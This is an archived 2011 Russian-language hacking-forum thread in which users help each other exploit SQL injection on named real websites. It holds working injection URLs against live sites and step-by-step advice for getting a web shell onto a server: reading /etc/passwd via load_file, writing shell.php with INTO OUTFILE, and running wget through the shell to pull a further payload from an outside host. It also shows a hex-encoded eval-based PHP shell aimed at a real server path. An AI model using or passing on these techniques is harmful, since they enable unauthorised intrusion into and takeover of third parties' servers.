HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18351  
Старый 23.10.2011, 23:14
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
http://www.lcoastpress.com/journal.php?id=7+or+1+group+by+concat((select+vers ion()),floor(rand(0)*2))having+min(0)+or+1--+
я понимаю значение етих команд, но не понимаю как и почему такое их скопление работает , хто может обьяснить или где я могу почитать?
 
Ответить с цитированием

  #18352  
Старый 23.10.2011, 23:19
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
я понимаю значение етих команд, но не понимаю как и почему такое их скопление работает
, хто может обьяснить или где я могу почитать?
/threadnav119047-1-10.html
 
Ответить с цитированием

  #18353  
Старый 23.10.2011, 23:26
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

всем ку)

http://www.uralremstroy.ru/catalog.php?group_id=104

с простыми эксплуатациями sql inj знаком, но как тут вывести кол-во полей ни как не пойму или там вообще нельзя вывести?

Заранее спасибо.
 
Ответить с цитированием

  #18354  
Старый 24.10.2011, 03:24
=Zeus=
Участник форума
Регистрация: 10.08.2009
Сообщений: 238
Провел на форуме:
724939

Репутация: 108
Отправить сообщение для =Zeus= с помощью ICQ
По умолчанию

Добрый вечер. Пытаюсь научиться скуль-инжектингу. Много читал, раскрутил скулю, все идеально, file_priv Y. Могу прочитать etc/passwd через load_file(). Как теперь залить минишелл? Ведь нужно знать полный путь, чтоб выполнить например такой код:

PHP код:
PHP:
[
COLOR="#000000"]SELECT '[COLOR="#0000BB"][/COLOR]' into dumpfile '/var/lib/mysql/shell.php' from mysql.user;[/COLOR
 
Ответить с цитированием

  #18355  
Старый 24.10.2011, 05:03
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Цитата:
Сообщение от =Zeus=  
=Zeus= said:
Добрый вечер. Пытаюсь научиться скуль-инжектингу. Много читал, раскрутил скулю, все идеально, file_priv Y. Могу прочитать etc/passwd через load_file(). Как теперь залить минишелл? Ведь нужно знать полный путь, чтоб выполнить например такой код:
PHP код:
PHP:
[
COLOR="#000000"]SELECT '[COLOR="#0000BB"][/COLOR]' into dumpfile '/var/lib/mysql/shell.php' from mysql.user;[/COLOR
select '' into outfile '/path_to_web/maybe_some_dir/shell.php'. Такого файла не должно существовать, должны быть права на запись в папку. После идёшь http://site.com/maybe_some_dir/shell.php?q=wget http://yoursite.com/shell.txt -O s.php

-O s.php - переименование. Это если система линуховая и ты не можешь сделать так, чтобы .php не обрабатывался на твоём сайте. Можешь просто форму аплоада сделать со скриптом залива файла (шелла основного).

upd. "e" - двойные кавычки, чот форум одинарные ставит.

upd. если тебе надо узнать путь, то ищи(сканеры директорий и файлов в помощь) файл с phpinfo(), оч часто на сайтах лежат. Либо пробуй вызвать ошибку скрипта, и если включён их показ - увидишь путь.
 
Ответить с цитированием

  #18356  
Старый 24.10.2011, 15:21
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

Цитата:
Сообщение от Melfis  
Melfis said:
select '' into outfile '/path_to_web/maybe_some_dir/shell.php'. Такого файла не должно существовать, должны быть права на запись в папку. После идёшь http://site.com/maybe_some_dir/shell.php?q=wget http://yoursite.com/shell.txt -O s.php
-O s.php - переименование. Это если система линуховая и ты не можешь сделать так, чтобы .php не обрабатывался на твоём сайте. Можешь просто форму аплоада сделать со скриптом залива файла (шелла основного).
upd. "e" - двойные кавычки, чот форум одинарные ставит.
upd. если тебе надо узнать путь, то ищи(сканеры директорий и файлов в помощь) файл с phpinfo(), оч часто на сайтах лежат. Либо пробуй вызвать ошибку скрипта, и если включён их показ - увидишь путь.
Код:
Code:
''
Ошибка же.

Вот так правильно будет:

Код:
Code:
''
или вообще без кавычек
''
 
Ответить с цитированием

  #18357  
Старый 24.10.2011, 17:04
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
/threadnav119047-1-10.html
чёт я там не нашол нигде ответа
 
Ответить с цитированием

  #18358  
Старый 24.10.2011, 17:55
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Цитата:
Сообщение от Boolean  
Boolean said:
Код:
Code:
''
Ошибка же.
Вот так правильно будет:
Код:
Code:
''
или вообще без кавычек
''
Цитата:
Сообщение от None  
upd. "e" - двойные кавычки, чот форум одинарные ставит.
перепутал с q -__-
 
Ответить с цитированием

  #18359  
Старый 24.10.2011, 18:23
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
чёт я там не нашол нигде ответа
http://www.xakep.ru/post/52222/
 
Ответить с цитированием

  #18360  
Старый 24.10.2011, 23:16
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

Цитата:
Сообщение от z0mbie86  
z0mbie86 said:
Что неправильно я делаю?
Код:
Code:
http://wifi.hm-ugratel.ru/?m[admin]&id=',''and(SELECT/**/0x2533433F7068702532306576616C28245F52455554553545B636D645D293B25/**/INTO/**/OUTFILE/**/'/srv/www/vhosts/217.8.80.55/modules/gw/jindex.php')and'
А там есть вообще sql inj?

http://wifi.hm-ugratel.ru/?m[admin]&id=123

http://wifi.hm-ugratel.ru/?m[admin]&id=abc

http://wifi.hm-ugratel.ru/?m[admin]&id=123'

http://wifi.hm-ugratel.ru/?m[admin]&id=abc'

Разницу чувствуешь? я - нет. Если и есть, то жесть какая слепая.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ